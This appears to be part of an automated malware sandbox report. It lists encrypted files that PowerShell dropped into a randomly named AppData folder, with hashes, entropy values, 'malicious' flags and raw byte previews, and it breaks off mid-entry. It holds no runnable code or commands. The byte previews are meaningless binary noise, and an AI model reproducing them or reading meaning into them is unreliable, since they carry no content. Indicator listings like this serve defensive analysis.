T..O...&..L..i.........^.F.77.N.../...e..R/(....C.'$.N..o..C...aI..G....A..\.6.....D.W..-.h.o...nA.Zy3.~*y.....M.......u..z..#.T.gN;..S..,(=...#".W....Za.....Z.2..!!.I.V.7P....gs...URO...$zf$&.w.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\gieIKJHGxaQUfS.UCmQtPkNovXKhRuFE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	183674
Entropy (8bit):	7.998948047575804
Encrypted:	true
SSDEEP:	3072:9aRiPKBZKcn0lDQh0fpBklCEFeVaX/m7x4FhQCO+/oSqYc0+WNyj+gWvYjVKPAkM:9FPvoODu0PMgaX/aKhQhSqYcbWNySgWM
MD5:	CB478918084459B36E5BD2A4684A4AB5
SHA1:	9FCE67067D2F1E566A2E754132DA3EA157F5D942
SHA-256:	1A3ADBA7F6141AFB4A4B6C5D20BE3C7656465EA5AB0D2576E9BFD616E6EF313A
SHA-512:	C0BF56BE9BF35FD393E61A47D699F455B05980D5E9784EEFFBCFCA3C7B415E7E2FA48EFEFB40A82D7D6D47669A1C39B8016246CFBA467D5ED72923B692AFDD9E
Malicious:	true
Reputation:	unknown
Preview:	......%....5[.U....t.b9b..4..QbH...............oS..o5....j..QR8,...."..}..d.....NN.K..!..Ls..FQ..7..[..6....S8..(...........8..~......m.x.g.CLn.&..Jv.&..+../...DHOZ..c.j]A..\|S]B~.3G.......H......./N...^.M...k\|.....I......z.4./~O>.O{..<..c...8s...Y....DQ...I.~.0\,.a{.....E.....}...\|....)g.V..@.}..5..^A...hr...d...o WQ~..Q._....iG.Jw;.......!...H:..}.JPD,..L.&+ ....xFd.......,.Q....i6.3.....4....tg..o7e(..%:..n\|.S.3...Mj.V[.e2N...v..c.@.n...<NWh?...H{W...GKX.I7.......W.?.......#. -..y.{.:.6..#Vd.O. .@.;.+...NeJ&`...;v%1........%l.......M=~=..c/..T.q./#.2...F...T#..3.^(.1.....+........(Pn7...@..Xo...:..............\.q5.y{.(..hh..5 .......Ql..>..1..............FH....5.......^J...7...7_@..}.o.y.%.......#...P.`D...l.>1.I...v.....SU..;0.o"...9%a+...pJs..+..(........0.Z.c...b<gD.........\.Nn..k..I.J(.d......}...fz....\|.>..Ti.D6~.....os..S.... ..0...< ...........c...A..7)..v.......E....\|1.=......ix.....h.a.....JtC.\|....j.....Y/..N.~\|..iG.6`.dmG.l..r.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hJubnGAQmLE.PTAlIqaNYZoUhVeQXm Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	197567
Entropy (8bit):	7.999167762932669
Encrypted:	true
SSDEEP:	6144:waUyfpWfSfDUlaXH251kN78MkfkMp0m+FBN263:PnxWfbcXHu1q78DkYm39
MD5:	6F104DB0EF509D443A9E7DC2DE868F3E
SHA1:	F4A51B0180E6D081F5323A7BF9DFCAE9971B55BD
SHA-256:	1594799F2325024D310CEDA24EC3F1B1CD595560F2848912F597883A54BDA814
SHA-512:	F829AD9556B29239D1F09E9676C245608C9E706A3410DC17A1ED9B2253ABA303C65F60841EBC36B8163910EADC64A66FBCE00AB8CB4CAC3B5506DA1CA587833A
Malicious:	true
Reputation:	unknown
Preview:	.k_......-k0l.f....Z.K...x..,.2u]...T......w.'6XY..B...P.....H...s.....^a...Q.Q.#3o"..d....^....q.A<.>.u..g.......dQ...2.F5...^..~!.../.[.....b..A.R...H&.&..........1vKYx:...<R........k...3."..5...v_.lAE...@~.c,......+p.'..jV\|.\|..+.q.a.B.n.....\|..<.....].(.zn(..:..%;W./I&.J..I..k.t..$...9..F.....W..`.a.@...4..D.....0&.]C...O..=.K.....S.Z.'...s._.'..H.M.J..O.n.M....{...X..p....[.2.og.....h.#....i)..E.......Q.......-.J"O.."u...@.r.AD.T..E.C..\YA...o...W.M\|....<)..s.1T..?k......Z.Fm..].A...1..D.2]....c..x.q.1.X%]?.\.I.Tx.r.%=.Q...;@..1a....v.......{Q..P...;..Bs...p..+.c...5..0l..C..{...n.^......`d.....A..0.c..0G.i......Y..2.B..h..I..:...j.p...z+..kU.G3.l.1.C..q.......H...`..x..6%.....Q.(&......,x.T...T...0.j.C..L...`...."...-t....J.2;.- ..[.cE^.. ............_.-....I...,..Z.n......Z'...ld.=.u..\$.P...... ..Mh..B....-OG:@..5{.BrI.x..2....`G{....2...k...... .x~..>.E....%...)\|h.IV=..w.....2.U....G..-......%~.lV.:.$ .:,.sOu=.0...!.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hKMRVtnWYzHGuAQBP.vwxUHMpgXftzB Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	50024
Entropy (8bit):	7.996149225541558
Encrypted:	true
SSDEEP:	768:RJTOIA9+Yi8LrxNg/9V+bTdp8TKYIiGNWN815gMMf9biC43lAnjvsL9k2utbQy1:RVOIAY2xSVV4kTpIJ15ibklBpuFb
MD5:	FC19B43DD3C7BF2D5AA4A9B8B7388E08
SHA1:	2978037F6FDF91388EE20439C62CA493F74C5E0C
SHA-256:	CAF22779615C6E0B7BF07ECEADFF5E0DBEDF2BC135964811E4B3EBA7FB7105B0
SHA-512:	DD592E731580C9C7CA5EE10F8FE0C57EA418BAA8A354B949119C2F7470BE3A78CDAF0B71F5026E0BFFB79FC34841CBE12EDDBD710D1704C6482AC907FFAF53A7
Malicious:	true
Reputation:	unknown
Preview:	.G...C .....ph...g.$V>.. ...1..W.~1.....G]...8.@uJ.....,..H4...V...#lFP..q..P...+..x]$.....[i..ul0..{a.....W...6..F.x...,gK...i.? ..$..~.J7..(c%...`.7A`b4l..6......>...h.R..?...=.!K.;..V.yY.I.~l.=.>....."-.5`~EnQ.._.,........D..jIP..-.r).C....,..z...y...X.Z.....$...2.6..=....g81...YP.YH)....R0,)o+.......<...i&"..?..)`..QQ5Z....;Y.!..K...w)"..)z...~..Kp.qQ..%....)]6O.......0p`.2.9.25qr.I.e.8...[.rLs.m...O@.c?.........;E........C....)"..".h.&.2"..Ag...-..4&...6^.3n...a.X.g.=.....i......n..ux)1)*..7...J..O..hb.....[!.Q.`s..'>..a..d....V..I<?...~qei...<tl.g.j...{b.a.B...... .[..F..1#}\..q..s..r.+..."....S~Ex<.\.:I?...%<...a.../...#..P..V.,v..Iy8..5......=}....^..8.r...G........u#C.t.&o..."4....1..\...5.Pwo.}.e.1v.z:...].........@..E......y..I~.E.....gL!W.g.w...^.._...b.]EH!.i......H.$W.T..t.^....._......5......U.9.gs...%.[..)l....Jm.=.K!.W...R....Q_.'..!.4s.<.......Q.3.b....)...#{.....$.{.GR. ...5....y..A.'..%...m.....muk..._q../y;.t....h.t>..+.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hLNVibmTFDpRd.wJepWrQaGbDuvVsfNLj Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	86102
Entropy (8bit):	7.998123744745081
Encrypted:	true
SSDEEP:	1536:9veKym5bWOeX8wV8qRW1UGYkTSqlB99bB+qz8nda8URdFNDIn04wWWLNtTqDSd70:9mKymRWOTU8+qdfpzbG5WLNpqGd70
MD5:	7AB9E4905D226A9CF909B1F2E55A7873
SHA1:	80684B3AFDB9A828281F87EEB6061CE6AA8F1CA0
SHA-256:	04BCECF6F31F02321693D943551BD8CB83625423C18C0B8843A575408753F8FF
SHA-512:	23724F4C113293F36466F34FBF22160554A063CAD9978659CBA9799321944F8025CDE076C339459643A4E8FF8882A820FDB91756E9C88806DC702FFAFD1ACC94
Malicious:	true
Reputation:	unknown
Preview:	!.......O..j.....X..2. (.Ya.J...b.5./\|....[].....:T7...d.3.i.?s..#O..UF........\)4.BSV.}8IO.....e....e.*..t...~i08.Y.1[..".....l.7..5.]...R.]._r..Q....&..C.!.]t.dc.y.JS..U.7...)..6.`.w....{....`.=..9...PRj..}.(e/.&.$..@a...C...C...]0;.D.mv..S..d..o.d..e.W&...l.uO.D.....;...g.C.....z.Zj..a..g.......0..\..G......+..q>WP.7H.iZn.\|..........3.'..A...K5..P\.l.}^wB.C5.....\.c#.v2....y.FmG..@ZV ;b.....@.....GJ,.G:........U}L..G;..2..b.H..h.l%.W.. m+..).....T..f..I.0......`(..X&Q.h...l...Z8.....{.\.EHT....Te?..k .....z.}.&.)...&..l.....@.X....Y..?..kN?.uXI}H..>..z.......~...=.....P.]9-T.7.I...].HZ..@)...B..H......tA........&.u..B'..h....f.qU.......y)../.o...7.......6.w../GK...........9.z&.d.k.....Qv....\|e.p.I.O..2.E.....Z.A.0...z..lM.Ut<o...Z..9....}.I..`.:\.W..@.[cLI......W.........P.Q:...nB...QE:..z.Na?..b...U........!@..s.a.W;~6..#.VR.TAR'.....M.......Vp.a...@.+...@.'......<b.Wu...~..ou..G.o..fbZ.%.......P.....%+Z..R`L.u..V.Q..l..n0[...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hNfqaRTzrMklKWAyHcX.bzisjZKpXHoBG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	186086
Entropy (8bit):	7.999064379118144
Encrypted:	true
SSDEEP:	3072:vw7cXMbq5RH3F/6J3maL7+YEmJKHVcc65AY6sqw2Upg3X+Pe/9lUpKH:I7c8mZ/CmamPVCAPsqw2Upg3X+Wg8
MD5:	E50A13C9E91774830187010D57212A52
SHA1:	B5CEA6779F70199103F393B44FEE99F82553A3DD
SHA-256:	680EEC1CD227F7936A2CC13B29A1C1FCE393E5E231895A815125774E2BA510A3
SHA-512:	0ADC2690DD27760ABEBD6AA2D2CB3B7F8F430DF34C2937BCF063CA535AFFE841761CCB67D4A6883CA3A3AB84F278238D0F6D8C5F3ECF9095CE726910D64B6588
Malicious:	true
Reputation:	unknown
Preview:	".J.G4&......+.e..../s..M....X...i......o.....7..->.g21......e..=o.w.s.,../.BR.@2..\|.......Z.....\U34....d..\|..ch..J}BmM......f..Wt.[.....3.\|..G.v...A9...?O.....^%/..[..7....U.&m.h.a...S.?K\>..?...n.\'..{ 6...0.....E....}.%./.....H.xWgn...,A.,(..B..Q..j.....M.Z.2.{......;B..%.....C=..8.......".[.w.K.~$b.n...W......m....?T..M.~6..J...`[@.*x..[c.../..].d....&....s..L..N.N.m......"....E.....I..;..~.....H."..2.&......R.r.?..:.T.j_4.%L..."....x...%,rZv..[?_.L.3......\....b.8.......>..{R.UTj..0...P.....G.\|&ZyM.\.3.....%[.i.M....0..c[-g...+^....EzS.Q...nN.m...uU....lZ.3...........^.rr....,.1L...&.. . M.R#...w...dC..wM.:.N}'.Y.../....N..N>....D...@.ua.s...t..t.6.s..R$[.).$"1.8..w^.b.%.k.z.Ke....5k.R....8.N.S.;9..zx\..h..7S.DH@Up...z...bN.FKg...ai...1j3..t~.C..nK.B....Q..C..A-w......].w..!.H.G....a...e.i.l.AG..l).W.......n.]...{..<&`........(7...7.....F..b5.../.}..'}<....&.Z4D....?.^...2....1.M+.Z_.}d...................(:..yS@YOU.....}G.wX

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hOBYjRLDcpGkugPXAe.AvytmEoNsK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	197901
Entropy (8bit):	7.999163693977579
Encrypted:	true
SSDEEP:	3072:UBsPBWA4EcBr3MaSsyXmvlS+K6oKptHu+usvR3d2Ez5fU3zWP3Zx634+UcS2hK5f:Esl4EcBjM0vo+fRHI+R3I2fgWPmo+W5f
MD5:	47D2F28746C625D6ED394D84E46CB2DE
SHA1:	C921A85775508F1AAC297858A853CF11521243C4
SHA-256:	372BCEBF65B03CB10445ED3EEA7266EC805ACFE1FA7471F4C21A9049B4A50F96
SHA-512:	573F0C6718090549F5D7319B4406BA25B6C20B86626529EDFEBD509BD56B41802E78915BE99F6E21E3E3984A78613E49D0F00D7580FE8646DDFCB07B1CD57245
Malicious:	true
Reputation:	unknown
Preview:	w .]jOO7f.R.n...[!.I...ft.P......7"~.."D.....P..+v,.....N...N..L..6.LcO.>..f.o#....x3..}.0j#mFu&Z.<.......x.8....Py.G.......,..... 2.......-u.J..]x....~E........i.,v}D.:...o.K.>.?....2.....2....."<...x.f.{...A...U.3...1Q..8@b._...G.-..q..7........M.s..&`.RCU....,GR...B...._...B..5.XB..u..@..c..8...-H.......h...z.~.7.D....rP\.]..a...i.-....-.X.?..T..T......vo..a?.....g..+..Be.......Y.1t..7.....~u.q.."}......f....k.5...W^C.^.P..\|e.v [y.X.....>.I..f.P.:).....3......$.(..}..........TM.\|....<......b.cP6.M..2.!..O.p...Rw..e.\|..AtH.....6@Tq.i.K.............qIO.."pS..."]y..(.1.../cn..S/.&5@.h...)......QX...4.'.\|...].$ga...y..l8.N\G.c..l....=.T.N.#..\|E$..5.7.a...5p..[....k....8.I.<....N.^.u.]4.M.B1.....f.m....O...4.9..d(..pO...Z..ya..K.....`.\......kPVv.t.H.>jA....B]...Q........g..#..o....a..K.w.H1..b.......\|.<H[.W.]6..' _.ls...]..S.5....O.,.~.." ?..:.;lU..g.c..U....".._.1..........bX..)..oq.1VY.........g)x.\|...eU..Q...B...&E.W..........;@...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hRYbzKvFiqJZeH.UsLJamwqQWZVOceo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	181795
Entropy (8bit):	7.998875044286317
Encrypted:	true
SSDEEP:	3072:sx/4xWs5sRT6AkUSm53NpNzREIpMDUwLvFpwM4E4aYqE23ueXtwYp5OsCpK25j:nWs5sRT5HzRULvwMPqmu65/Y
MD5:	093021729EC1CCDF525764FA6FDAF0D0
SHA1:	0DC9E60CC15F5CA4A6117EE674306A9FEBAB15EB
SHA-256:	E44F837B226DA4CBE0F08AC5E91B0B2510546B8CA9966478C3495832AB32C11C
SHA-512:	3FCD9349F730DF926617D8345941E33864B3B40B4BFAC90AE5F10312AF1C334F3F7B7B4161CADE597604EB9406D4B52D3BD9182BB8DCC471D51EC9C1FAFE63D6
Malicious:	true
Reputation:	unknown
Preview:	4....f..~Vg......-....7x.5.k..aslE`...g<.P.....!"c#peoq.p..W!...A^~..IQN..r.u.\.J.L=....J..6.....zWj:.."...(..I......9..kh....U..f..p.\1k.%U.".............].rB....g.,.PK..3.H.,..E.(Ig....n....^.....k.(..`{...K;w.L.\|..1..B.\...dB.;.2.).2(.hE...#.%^=2.j:.ht.E.\^..c.>Dg".Io..../M8..'....\|....B......;6..q.lE..O~.Y..>\|.Pmg[,.....S....'..Q..o...2hk..Xh.m..d..X...._.h..C=..vz8.W...^...".....R..(p.I.{..=...X.,BZ`a....jE.7<..SR}Q....{.J.....o.E6.._Y.&.r...u}..ceL..O!..{..xEob.........r..tf...^.e...8.bXA..^m.....Q.....'.O.....K.X....T.....3a.3....g,P2.+.9.2ND!.....<ZGn.....pY..kp.,j..A...q.i.....}T..hWit.%.\pM.....[S.....2.E.......r:^..}v#.......;.e..pBw.......[..^ ....ed.y.+..9X..C6C...=...Y4.+P.Vu4?.O'jn..gjfq....;[)...!...`....$...../..d.p.L...b.L&....`.2..d..ML.#.b...6...!..M...w....vy..r.......8.2R.Ia.z>!.<...O1"^........P...^.%..y-.:.Z5.;..L...[Ts.......$<.e_.0....j.j..9....>.v..F.0EW....n9`.hU..-QF~~.m....4.P..?+.].xR..RDnl.!..m.l.S.A.F

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hZIDxbvErgwOMj.IvpheZgswJKVQxEorMi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	66427
Entropy (8bit):	7.997515256916792
Encrypted:	true
SSDEEP:	1536:4K7xb0hcRgNFVQ6yClP21Y+OcU3/iCYyfTLu5QH12L:1iNFVpyAP21DOcUK+XuyHI
MD5:	BFF2CC2B8B45D43DC94C3D99DE5D233C
SHA1:	776D4C92D3995FDB8C7F341BB888FF120BB97897
SHA-256:	8DEC3A3138AE1BC2E765D85D65A3C6944C4BF88A4A4C6194EECC5CD822E302CD
SHA-512:	F248297FE399C3C3C503848FBA737FCEFACDDE22B66D52B109716DC84D8EABD3BC49D041E75A6716E01A802E30404F96352180B10D340989CB2A77024ACD640B
Malicious:	true
Reputation:	unknown
Preview:	I.e#...uC./...L.}Jk;v...L .Mo.kY.. .........:...8.G.J.....ki.T...\....E"...".e..3.{.I....=".4..~=z.....F...o0.x.../.{h.=..l.bv..\=..y......A.lq...WO......O...ts.$.^._....w...h....+.i.G.>...........bG..._T..<...H,T-U...C"C...A.~.\|7...`.,d......}y.e.6...C..X...OI..dq.l.l$it{.`G...E..d.......^~V}PR...c._.(....l.P....d.$......r../\|TF<......?.....6..);......a..6..>......N.~4.T.Q...R.k...3.a@2...=.p..[..ZG.{P.9...._...o.....q]... C6.,..v......'`.v..P...r.v...T.<....S..v?F..7......>.@w5^Z....d...0..#....J}....'.qZyB~tR.4..r.Rq.Y.....d........(.<.B..18.....M./f@......q8L...._I`.....+3.p.....>wn1..&.<.t&\`)..0..S.Y..3.....'C.Y........S..Z..i:....n.e.#.n........\|....#.;.zI.?.....Z.77..:?..h!.~Sn.q.1A....y..+D...a.E..R.."X.n.7.j....!C{.`...g=/.a(....]._...._.....#.3.......\Q......~.x...Tt.4.V,}KH.w.^...8..Sa....2C...\}...d...B.H.....&...8n.(.K......o.....N..~...@.....[kxjF;.........~.".L..\.0}.._...@..a.c...Q...q(}(..'\.w.y...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hfYTmkujvtb.RqiwAYcPtGH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	197697
Entropy (8bit):	7.999107954467095
Encrypted:	true
SSDEEP:	3072:vNx8hQuaxlzX08kRbTcieCyzxf57J8fbUTi1ksMMu1tQAIRfMG+00U5sqkJVA/Z+:VJuYlzE5bTkf5F8fbU+vIfyW00UTk7lp
MD5:	CD3E5E216DB08CD67AD019F559C4CF02
SHA1:	6BEA4AE19AB30C3FFF06AEE7FEC6C6044DEC5F93
SHA-256:	8184BB8E9952BCB9146C26FA8449CB590F7E3DB7D450E34326DD71C24D84F158
SHA-512:	654799802F86C5CF14E26C345236BFCD6E65321FD3AED5D7FF6DC37650D40E770CE0A2A1B1436BE06FCE843D0E2DF16B3513C7D09AF6EA363A463405964EC4C6
Malicious:	true
Reputation:	unknown
Preview:	.[.e......+UM..b.,...e...c.bV..2.R....O...-...^Z...g...o.{<.....e......\..8.k...in./..}$PO..Mv`6..TcB.C..Q..G...v.$O.is.\|.T...N...N..?j+,24..K(].R.G..x.NW...BSTE.0.z.#.7?.......{...'."...<9?.E........zi..7@.3F.W.........Mb..kr.$cc.5.=....V..+<p...m.......e..sk"b.AU..md...."&-s....q.8)!.P.....H...{...tz...8DT..k..........)Y....7a..S...(....Z.i;.z......I.Y..:..P,.r..^B.e..S....!.2...RL.k.5.....<.\|(...r.....e..X.D%I3.....,I..U~......W..r..e&....r...}....)..,....h.@.:i.D....!]ri....W8{.^...+...O%..i.8Gq......K.[z.../2V.@..........9.....u(.h..d...T....v:Xh..(..."....\|PL.....P..e.../.qZ.I..LT...].....V...M.4.om.1....2RA.....?..uu..%=...@}j.7...k._....&..3..n...".......j..G.[.g...........ih.............?...\..Z..m......~...}".....\|...Rh57.a...ID.+.$0+...N..,.........U.m..q.w_k.e.Yakq..l.O:...4C..r<[....,x .....F..\|,.l...<\x.........M..._. A.........t".....k.....<fod\|.`..tK...8........#....n.I~$\.Vs'....hE.z{..fF0...=..n.........u...Z.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hlxJAvcsUmY.wfOgcqMWPNipz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	116203
Entropy (8bit):	7.998275755925182
Encrypted:	true
SSDEEP:	3072:zXGVUsl0W+gsnp/7EbcxNDdAYR1FoZEl1:zXGusl0rgsnpzmcxNDdAYLF+EH
MD5:	C0426FC3DB4B1BD8006F9B78D4EB582E
SHA1:	AEA59530A8EBFACE64F46693B02B68CA7B258EBE
SHA-256:	79691F0DB440D59893544AF06BB28E5697BE751350C2305333DE9BAC0B862F3D
SHA-512:	1692AF695D6FE6961173EB42EA389EC2BF1777B5DA101378FD4963923704F453036F2167D100C1B6961E38884C711FDB1819BB2B28ED11B04186F1A4E229DC37
Malicious:	true
Reputation:	unknown
Preview:	l<3.1..!~..... .5x....;...85. ..4.ca?Q....D5+.\|$.s/.S..oa..>..6X....9n1..[..mi..w...d2....0.\....@:...3.+..a3....P.y...[...#..v1.7r-.0._..&rA....y.^../....WY...c.%.H...q..~.xf..mj.T...X..;qf5#...0...n..z.%.{..o..I..6?......TGR...YM$<.`..:.N..~S._.w_.m..ob7.X)C...i..G..d...6.!..s.Ux....t...^../ .....7}.J.u].@...7..C...d.rb)...A.Y..X.\|<V!K.k2x..d.P..bEz..!..U...v:\Z..R2.....0......\|.I......?..V.>}ws..X.IAz.hp.!.......{$.6..".@.tqzJ...#%.Sd.z...B....M..O1...'.:R..D.w.u..t.Yi.......i#.N.+]8.?x...F...H.\@...;.VF.._........R.4.....O"Y....j..L.~......<.1-C....[..$0.......6..q..n.......Mw..xs..R.m..bX. .]..f....K.M.t..f>...`ix....f.P..........FVeSpc$r...x.B.%....p. .m..,...Y.""1.@B.!=.3p`#.'Y..fI5..s...g.2.........S..9.d...=.."..L...J..6..T@W.NQc..lQd..;.\|..xl.E....W."..%7#.(P.V..l..5/f\..lT.[.x=W`a.PI.....<Sw."...C......1@^\|.(9......#.5..N..y.2.q!5}.....cS....h~Q,.*.L..AL..+.j..mc..O...._.X.>..Gl..\z._.(wg....c.l....l...s%c#..{..x`..-Ev.]..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hwoIPieCajyQZ.NovXgDSecmiWzL Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	151136
Entropy (8bit):	7.998859792119197
Encrypted:	true
SSDEEP:	3072:EGcBQWhOEIKKYQg58fkJddJNHyE21J2QzK/xdKK3ne9D8rG4ltB5Ee5ILN:EGCs+CfkXfNHyES2SwdD3neh89bj+LN
MD5:	9FEFB3A2D06BF5A3A970EB485DC57937
SHA1:	E8A51D642A0BE39F61B0C2C6195485E4645D088F
SHA-256:	32D4553A7F230E90AE39D0B6AC373A7357AA0A4AD2C8278B5AC64668B8D0CB80
SHA-512:	A3DEF0CE95CD4435088A6EC2F5A9054ED36358B18E2C35DE40AE38570364C916FD1EA977863371B85EE497F2B1593E737267AA6E1A332BE98548D24AA5B637B7
Malicious:	true
Reputation:	unknown
Preview:	..Y..dW2.e....\..P.E....D../..oH=....{..>._...,:Y=..<@.\|.V..'...9x}...X._.....+.Q....x.?.Q.$...}e.......o57..0+..R9.>.w>.<.3........)..E.........W.Cq..)p...Qo.E..z+...G.s...6.o.:.)+G.Z.a..{r.)..[.S.X"r}O..O\|:^......dO..?.\.E\|.&........P..~\..yTl..3V.......V_../4..km..Z.2n...I..J.9...)......Y..eE...c.w.B...g.\|9..j.nnC....w..JK...Z[.c....)i9..l?.w..EBWQ..W-.?.c."..^o...B.......-&..-...d.sM1......p$.+..b.+8V.k-6...h.BYM&.....T.-..M.H......,6y. .Rr.@x.......K.)7..,t$...>o!.-Xe.y...H.62.e2......B.A..N ......W......<....w..]...J#....l.J.\|....)....S?.....k..J..lCu.6c9.K..~......A.....".....6Db.`.>..k....T...f>w.#..8..`;.N..5.sh`...P...%(...;>..'.t.X/3.l.8..b.....D....:.2...."AK...0Z...a..U..3..S.@.xL......Z...F.O>.6.}g..M.V[.9...s..>..P:..U.ukfpR<U..8.j+.2!...a.<;....-,"..A..r._e.a..os`......790ek.?'.r./)...MWo>..O`..Ix..E*.Mh.Bm.h\|z.@I..]..c!.....^...,.1.".}.d..i..OHt..H...+O.r..^.O.M..n....!..x./...7f.kH...).HIT.....A...]...s.B..t..".v.....{.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\hzOWRqiKCu.YqEcenkQtLVrGjxFyZJ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	62936
Entropy (8bit):	7.996605396391624
Encrypted:	true
SSDEEP:	1536:m1+aiDG6IwnHnzttljjppxLTqtb9i4HZiPUlTQAJtKSLh1tSUtq2+Tf/Ap:s+Z7HNNptYbNsPUfprHg/Ap
MD5:	BB8A46D76BD9108A93F3822AE3D43B22
SHA1:	E7834F52BAE907534B93D15189406A532BBBA067
SHA-256:	1D40E21C6C210E5AC01D9296798FBE7A1EDAA8D3E2E54F1F95EB5B2833B5CD03
SHA-512:	78A49D3A3D50BA81054F101C16B8FD9970D600B3A19D5B02DA2F1BCA10D17D4CDA0D9E7E3772F1371F43EA86335ED687F8E13D776E475BCB922751BC620C99C7
Malicious:	true
Reputation:	unknown
Preview:	..Y..B."\|o.@.G....H....,P.....2....MXy...(.e....\d.-.43..:....yi....U..p.........b.T3...>5.?/.\......-1.hr.....6..q.w...I;Wn..g&..V..f".2f..........Dq5......a.....]..nN.DV...$..z...+...uHbf....-p....-......(..5U1....!.Q.#....3u.........).=.i1.AjT.d..O...J@...q.jWA..R..3...K.a...<,.c.+.f&\|G..~N.)G......Z..T.O.``?u=.......W..s.a...R.>....j[r...LC..AKW...H.X..M...u.f7"...\.x.Io:.k. =.......5.....r>...vo.-ij..&..r..m.oB....?..........R.]..c...;.m.Q..m...F?....Gl....&.H...V+E..@.....;...............?H.B.W..].;.....%..w.=.+.~...4.....5..........j.e.d..b2........"@.....1.c*X....s..& .G..w..4..n.`T:T..X.6m8...N.....aq..[.r..t..G.O..fAI....b/om#[b.^..b.]fj.a.\|3.....-.j..p....:..Y...I....F.....pQ@..9.:2.c.g...#].cz..$.r.kOd...p.....SWG.7x....Y...._...@.{.i...@.c...&z...>.....$.h.........V.UU.~.......C....tI.8S/.L.:.O...`.K...].[.bJU$.....i\.k.&.1....[....Te...Tak..(.&1>.R}.0J_..lo.L.@..-.u..R.8..A8.._.A..3.w..k.........f.J..v.19.y.M.....q

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iDzCcMrfxXp.dwDFLMsnlkSWzGejtTC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	84064
Entropy (8bit):	7.998114006748015
Encrypted:	true
SSDEEP:	1536:eQTkk/JtG1eYK0dBW4ck2v3PG1CfwulvFGlVuhCxQp2ivUCmard:3QeJlxwWP3vO1Cfxlvwo19rd
MD5:	9B59C05C6ABBD06D17F16D57C524F762
SHA1:	50FFEF62DF476C7503A85617A2AABAFF27C5CC2E
SHA-256:	31FD42B2BA970ACE4469125240AD1D906E23229F5567C748E3AE84C749AF972E
SHA-512:	FC4344334B534EEF60F8ADD21DD26E39AFD0B36D9390687431E6904E3006BD293316FAD7EFF928324981CDC018414DE30D6EF8904CF5271E39D5642B0E96C1D2
Malicious:	true
Reputation:	unknown
Preview:	=UF.N.y.!g.Y).h....c.&>..........1.A.J2d..k...g..........e..F..W\.?Fc.......D.q....c......Q.....G.......D.$ R/._.-...~.:.?.+p..~;&...r......q2......(-hc..Wz.#i.i#.I..p.......S.....za.L.....N.M^..zkEs.$.....V......<mT....3..F...>.....R....?3.=.~...%gMY...z..I>^..B.<(...a.H.lhA....I...+............Bh.P.s.P..8..U0.}....A.^....iF...>....F...x~b...9...Qs.k\....{Q.._.n..^...c3.R.......dT........okju.V=....s...3..h.c.`j....#.fZ..D......D...?.T.hp..p..qJ."z....&..^..6qE..TW]......%;..E..w..v..R..jb.}..0..C..../.P..H....M.c...G...5.;.N..R..f.G.<..G"....l.y'8....L..d.On......)...4........!..Mu(....3..r.......2..y....C\..R..mf.o!....('.V..A3b...6....e.,.(2.*.fN..Q.\|O.....E...9...c...s._..f.\|..\....=5...G..z9.wD!....'R..r.he.[5......6..(.&._.........b...7...q....yX2...m..c...i...E....-...o&.YuL...~..p-\|m3.M.O60}4:!`g.I..#<Dn.ie../.u..51.6[.g9..%:+.Z%.Y.\|.?).w.Mt....=+6.o.2..G;H.>...W..0...5.x....f..x#Nhk.....\|.....9\c5...u)r%R..0

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\iEbWgPnpSUAyGuqMrx.FnlgkRCQMu Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	112257
Entropy (8bit):	7.998281662662847
Encrypted:	true
SSDEEP:	1536:lgNkkxTZM3jDCGxdzFJCXI8iOOPSX5YbwvCGXpkOMZmFmYT+X+LKQfuozjT9/9X6:lUKjDj7FJCXGtPSXgQkOUbW7jT91ctAg
MD5:	FD575592910892F416B8A983B8B48B64
SHA1:	4A06BD68430B7D4EC529238FA1BA9D9E07C8F08F
SHA-256:	4E213BEF559B4136FAF1CC6A12DC5F14B0F5150B27DF0F746AEF028849947728
